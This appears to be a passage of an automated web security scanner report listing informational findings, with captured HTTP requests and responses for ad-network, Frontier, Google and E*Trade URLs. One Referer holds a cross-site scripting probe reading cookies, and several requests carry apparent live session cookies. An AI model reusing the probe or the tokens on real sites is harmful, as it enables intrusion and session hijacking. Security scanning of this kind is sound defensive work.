Content-Type: text/html
Content-Length: 629
Date: Tue, 06 Sep 2011 12:45:30 GMT

<HEAD><title>Click here to find out more!</title><script>if (document.all){setTimeout(" location.reload();",60000);}</script></HEAD><!-- Rubicon Project tag -->
<!-- Site: Oberon (No Telecom) Zone
...[SNIP]...

24.12. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Request

GET /iframe3?M0EnBfsYGQDMqpkAAAAAAH7vJQAAAAAAAgAAAAIAAAAAAP8AAAADCF2yCAAAAAAAF7MxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAByawMAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAMDEXZPBPwAAAAAAAAAAAADAxF2T0T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADyM7pcvfauCpvklJWDGZaJ844CyDZSBbQYVKfLAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15sa69po3%2FM%3D787833.14486084.14323910.12559432%2FD%3Dallmyfr%2FS%3D360632246%3ALREC%2FY%3DYAHOO%2FEXP%3D1315319387%2FL%3DrUCgA9j8evXpARpjTl.wjQkMMhd7ak5mEjsAAiW7%2FB%3DejW9Ptj8el8-%2FJ%3D1315312187399365%2FK%3Dnql_VTEk0rLg6_ewKQ00GQ%2FA%3D6284639%2FR%3D0%2F%2A%24,http%3A%2F%2Ffrontier.my.yahoo.com%2F,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14486084%26Z%3D300x250%26_PVID%3DrUCgA9j8evXpARpjTl.wjQkMMhd7ak5mEjsAAiW7%26_salt%3D1505089003%26cb%3D1315312187399365%26i%3D224114%26r%3D0,e974813c-d883-11e0-9781-78e7d15f7c8c HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=rUCgA9j8evXpARpjTl.wjQkMMhd7ak5mEjsAAiW7&ad_type=iframe&ad_size=300x250&site=224114&section_code=14486084&cb=1315312187399365&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15sa69po3/M=787833.14486084.14323910.12559432/D=allmyfr/S=360632246:LREC/Y=YAHOO/EXP=1315319387/L=rUCgA9j8evXpARpjTl.wjQkMMhd7ak5mEjsAAiW7/B=ejW9Ptj8el8-/J=1315312187399365/K=nql_VTEk0rLg6_ewKQ00GQ/A=6284639/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!%!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!,Y+@!$[S0!2reF!''w-!!!!$!?5%!'jyc4!i=9S!!J0T!(>n0~~~~~~=3]gE=3gdJM.jTN!#101!,Y+@!$XwL!1n,b!#t3o~!!ZH)'jyc6!w1K*!!J0T!$!$U!$]7n~~~~~=3]ih~~"; ih="b!!!!(!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!%=3]ih!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE"; bh="b!!!#C!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4dM!!!!#=3]fh!!Os7!!!!#=3G@^!!WMT!!!!#=3]fx!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:49 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0013.rm.sp2
Set-Cookie: ih="b!!!!)!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!%=3]ih!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE!3Eo4!!!!$=3f.'"; path=/; expires=Thu, 05-Sep-2013 12:29:49 GMT
Set-Cookie: vuday1=4M6Eq4M6Eq!79C88CF`W; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: liday1=*YKly!79C86nkxc; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:29:49 GMT
Pragma: no-cache
Content-Length: 996
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10070732);}
</script><IFRAME SRC="ht
...[SNIP]...

24.13. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Request

GET /PortalServe/?pid=1394840Y52120110823224152&cid=1512429&pos=h&redir=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bW92NGptYihnaWQkYXkzOTlFU08yMlRwQVJwalRsLndqUXFiTWhkN2FrNW1GZEFBQW14USxzdCQxMzE1MzEzMTA0MTkzNTAxLHNpJDQ0NjMwNTEsdiQxLjAsYWlkJHRrcFc4VUplNXFBLSxjdCQyNSx5YngkUC5PSDNVZ1FtaGRTUV9HV1dQbFd3QSxyJDAscmQkMTZpNmRwbDFzKSk/1/*http://global.ard.yahoo.com/SIG=15kacfpj6/M=999999.999999.999999.999999/D=music/S=791000026:LREC/Y=YAHOO/EXP=1315320304/L=ay399ESO22TpARpjTl.wjQqbMhd7ak5mFdAAAmxQ/B=tkpW8UJe5qA-/J=1315313104251332/K=k1l.VZAYPvQ2T2sK4DlGjQ/A=3685707077155226847/R=0/X=6/*$CTURL$&time=2|12:45|-5&r=0.34970951941795647&server=polRedir HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://new.music.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CBJ9xErENUwPwYAcUBBe; PRgo=BBBAAsJvBBVBF4FR; PRimp=43AC0400-C054-18FC-0309-F71007140101; PRca=|AKfq*9:2|AKcV*1774:3|#; PRcp=|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|GV12:2|GSur:3|#; PRpc=|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 06 Sep 2011 12:45:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 6172
Set-Cookie:PRgo=BBBAAsJvBBVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=45AC0400-CF32-A440-020A-0900001F0100; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKgy*39173:2|AKfq*9:2|AKcV*1774:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKgyAKLp:2|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|Fqr0:2|Fqqc:1|Fqqq:1|Fhqf:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GV2B:2|GV12:2|GSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|Fqr0GV2B:2|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

<script language='javascript' src='http://spd.pointroll.com/PointRoll/Ads/prWriteCode.js'></script><script language='javascript'>var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=functi
...[SNIP]...

24.14. http://comcast-www.baynote.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://comcast-www.baynote.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: comcast-www.baynote.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Server: BNServer
Accept-Ranges: bytes
ETag: W/"162-1203630898000"
Last-Modified: Thu, 21 Feb 2008 21:54:58 GMT
Content-Type: text/html
Content-Length: 162
Date: Tue, 06 Sep 2011 12:22:46 GMT

<html>
<head>
<title>Not Found</title>
</head>
<body>
<h1>HTTP Status 404</h1>
<p>The requested resource is not available</p>
</body>
</html>

24.15. http://games.frontier.com/graphics/frontier/1000/site/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://games.frontier.com
Path:   /graphics/frontier/1000/site/favicon.ico

Request

GET /graphics/frontier/1000/site/favicon.ico HTTP/1.1
Host: games.frontier.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 8
Date: Tue, 06 Sep 2011 12:45:41 GMT
Connection: close

404 oops

24.16. https://login.frontier.com/webmail/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.frontier.com
Path:   /webmail/

Request

GET /webmail/ HTTP/1.1
Host: login.frontier.com
Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:30:21 GMT
Server: Apache/2.2.8 (Ubuntu) mod_python/3.3.1 Python/2.5.2
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9630

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html lang="en-US">
<head>
<title>Mail :: Welcome to Frontier Mail</title>
<link rel="icon" href="/med
...[SNIP]...

24.17. https://login.frontiermobile.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.frontiermobile.com
Path:   /

Request

GET /?sae_nexthop_template=freetrial HTTP/1.1
Host: login.frontiermobile.com
Connection: keep-alive
Referer: https://www.frontiermobile.com/data/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:51:38 GMT
Server: Apache/2.2.16 (Debian)
Expires: -1
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 16142
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>FrontierMobile :
...[SNIP]...

24.18. http://p4.a7jekt64iaasm.m2lwolbkh2abdsnv.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/iframe.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p4.a7jekt64iaasm.m2lwolbkh2abdsnv.if.v4.ipv6-exp.l.google.com
Path:   /intl/en/ipv6/exp/iframe.html

Request

GET /intl/en/ipv6/exp/iframe.html HTTP/1.1
Host: p4.a7jekt64iaasm.m2lwolbkh2abdsnv.if.v4.ipv6-exp.l.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p4.a7jekt64iaasm.m2lwolbkh2abdsnv.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html
Cookie: PREF=ID=6140ef94871a2db0:U=9d75f5fa4bcb248c:TM=1310133151:LM=1312213620:S=1dVXBMrxVgTaM0LN; NID=50=RiW-T5rw6UNHE15U6e4ijurLlYQOhNAAx3AsgOlhf7JoXYr8k9p6zhr8BmRYYCm9S9iqhE9q7qPrM1SddgaXFMnn_WCOi1yRRQBODECSO7QxI_jJn0Wa1bbVacK0-r5F; SID=DQAAAO8AAAAdw-kaWu-Fwov6yR3LF5btMP1jnbGP3lA1M5cAk-0Wck2mlABMlKMllxla9PLwToQ6Dzrhz-v1Lq7PQ2o3ThUVIxuB7SVIVJjmSOGo3UpjxZ2Ms-siayi9e5mR3fQNgCwvNMI1ZR5pi86UDX3RjSEUkvGudz_HwxzWhdkifKTb2Pueggnt_R-Wq4cYX1myqtEWIr4ingATgva_JfCprkupgYOaut-TyOgZMu3abzangqdXu7C23wrZk52zsQqyvN8cgmKEcYqsYLb7POsFQ_k_vJG6IgdGLAd92mNx9HVO7YYTbQzVbwOwFdQcMZ4kaGg; HSID=ASQKbekgY7NOzCbjB; APISID=yDIrlyJyOEC5lWwI/AaFthBiKWYI1xFYHH

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: text/html
Last-Modified: Tue, 19 Jul 2011 09:12:38 GMT
Date: Tue, 06 Sep 2011 12:55:25 GMT
Expires: Tue, 06 Sep 2011 12:55:25 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 2298
X-XSS-Protection: 1; mode=block

<!DOCTYPE html>
<html>
<head>
<title></title>
</head>
<body>
<script type=text/javascript>
(function() {

var f=this,g=function(b,d){var a=b.split("."),c=f;!(a[0]in c)&&c.execScript&&c.execScript("var
...[SNIP]...

24.19. http://p4.a7jekt64iaasm.m2lwolbkh2abdsnv.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p4.a7jekt64iaasm.m2lwolbkh2abdsnv.if.v4.ipv6-exp.l.google.com
Path:   /intl/en/ipv6/exp/redir.html

Request

GET /intl/en/ipv6/exp/redir.html HTTP/1.1
Host: p4.a7jekt64iaasm.m2lwolbkh2abdsnv.if.v4.ipv6-exp.l.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/search?utf8=%E2%9C%93&query=xss%003d6ce%27%3prompt(document.cookie)//9336b0fa1c5
Cookie: PREF=ID=6140ef94871a2db0:U=9d75f5fa4bcb248c:TM=1310133151:LM=1312213620:S=1dVXBMrxVgTaM0LN; NID=50=RiW-T5rw6UNHE15U6e4ijurLlYQOhNAAx3AsgOlhf7JoXYr8k9p6zhr8BmRYYCm9S9iqhE9q7qPrM1SddgaXFMnn_WCOi1yRRQBODECSO7QxI_jJn0Wa1bbVacK0-r5F; SID=DQAAAO8AAAAdw-kaWu-Fwov6yR3LF5btMP1jnbGP3lA1M5cAk-0Wck2mlABMlKMllxla9PLwToQ6Dzrhz-v1Lq7PQ2o3ThUVIxuB7SVIVJjmSOGo3UpjxZ2Ms-siayi9e5mR3fQNgCwvNMI1ZR5pi86UDX3RjSEUkvGudz_HwxzWhdkifKTb2Pueggnt_R-Wq4cYX1myqtEWIr4ingATgva_JfCprkupgYOaut-TyOgZMu3abzangqdXu7C23wrZk52zsQqyvN8cgmKEcYqsYLb7POsFQ_k_vJG6IgdGLAd92mNx9HVO7YYTbQzVbwOwFdQcMZ4kaGg; HSID=ASQKbekgY7NOzCbjB; APISID=yDIrlyJyOEC5lWwI/AaFthBiKWYI1xFYHH

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: text/html
Last-Modified: Wed, 25 May 2011 00:42:54 GMT
Date: Tue, 06 Sep 2011 12:55:24 GMT
Expires: Tue, 06 Sep 2011 12:55:24 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 216
X-XSS-Protection: 1; mode=block

<!DOCTYPE html>
<html>
<head>
<title></title>
<meta http-equiv='refresh' content='0;URL=iframe.html' />
</head>

<body>
<script type=text/javascript>document.location.replace('iframe.html');</script>

...[SNIP]...

24.20. http://pixel.invitemedia.com/data_sync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /data_sync

Request

GET /data_sync?partner_id=77 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABiUZgAAAAAAAnhJQAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAXLsgAAAAAABfoTEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC-1vKFRPquCrnRbevBKa2aOyXC53U8C3Yzkg4BAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15jnbi3cd%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320284%2FL%3DF8DhwmKIPE7pARpjTl.wjQIRMhd7ak5mFbwADIEZ%2FB%3DFBSePtj8fcY-%2FJ%3D1315313084968840%2FK%3DtHb_lv57MAgihszSpmJhkw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3DF8DhwmKIPE7pARpjTl.wjQIRMhd7ak5mFbwADIEZ%26_salt%3D2271271428%26cb%3D1315313084968840%26i%3D140509%26r%3D0,04162e62-d886-11e0-b0bb-78e7d1fa057c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=*

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 06 Sep 2011 12:44:56 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Tue, 06-Sep-2011 12:44:36 GMT
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 572

<html>
<body>
<script type="text/javascript">
makePixelRequest("http://tags.bluekai.com/site/2748?redir=http%3A%2F%2Fsegment-pixel.invitemedia.com%2Fset_partner_uid%3FpartnerID
...[SNIP]...

24.21. http://sensor2.suitesmart.com/sensor4.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sensor2.suitesmart.com
Path:   /sensor4.js

Request

GET /sensor4.js?GID=15493;CRE=;PLA=;ADI=; HTTP/1.1
Host: sensor2.suitesmart.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: G15740=C1S104345-1-0-0-0-1314814746-0; spass=a1bfb027540676fe37eda0dd3047b05c

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:50 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: G15493=C1S99917-2-0-0-0-1315313090-0; path=/; domain=.suitesmart.com; expires=Sun, 04-Mar-2012 12:44:50 GMT
Pragma: no-cache
Cache-control: no-cache
P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" , policyref="http://www.suitesmart.com/privacy/p3p/policy.p3p"
Connection: close
Content-Type: text/html
Expires: Tue, 06 Sep 2011 12:44:50 GMT
Content-Length: 376

<!--
var serviceFlag = typeof(serviceFlag) == "undefined" ? false:serviceFlag;
var swCtrl = false;
var snote = 'Sorry SAM';
if (typeof(RunService) == "undefined"){
RunService = new Function();
S
...[SNIP]...

24.22. http://uac.advertising.com/wrapper/aceUACping.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://uac.advertising.com
Path:   /wrapper/aceUACping.htm

Request

GET /wrapper/aceUACping.htm HTTP/1.1
Host: uac.advertising.com
Proxy-Connection: keep-alive
Referer: http://uac.advertising.com/wrapper/aceUAC.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2
Accept-Ranges: bytes
Cache-Control: max-age=3600
Expires: Tue, 06 Sep 2011 13:00:24 GMT
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
Content-Type: text/html
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:44:59 GMT
Content-Length: 2793
Connection: close

<html><head></head><body><script type='text/javascript'>    
// pingArray['cookieValue'] = ['extra_tag_property_name', 'matching pixel called']
var pingArray = new Array();
pingArray['rm'] = ['rmcpmprice
...[SNIP]...

24.23. https://us.etrade.com/e/t/jumppage/viewjumppage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://us.etrade.com
Path:   /e/t/jumppage/viewjumppage

Request

GET /e/t/jumppage/viewjumppage?PageName=top_bullish_stocks&SC=S047401&o_id=60DAY+500&symbol=&ch_id=d&s_id=yhoo&c_id=BLLST HTTP/1.1
Host: us.etrade.com
Connection: keep-alive
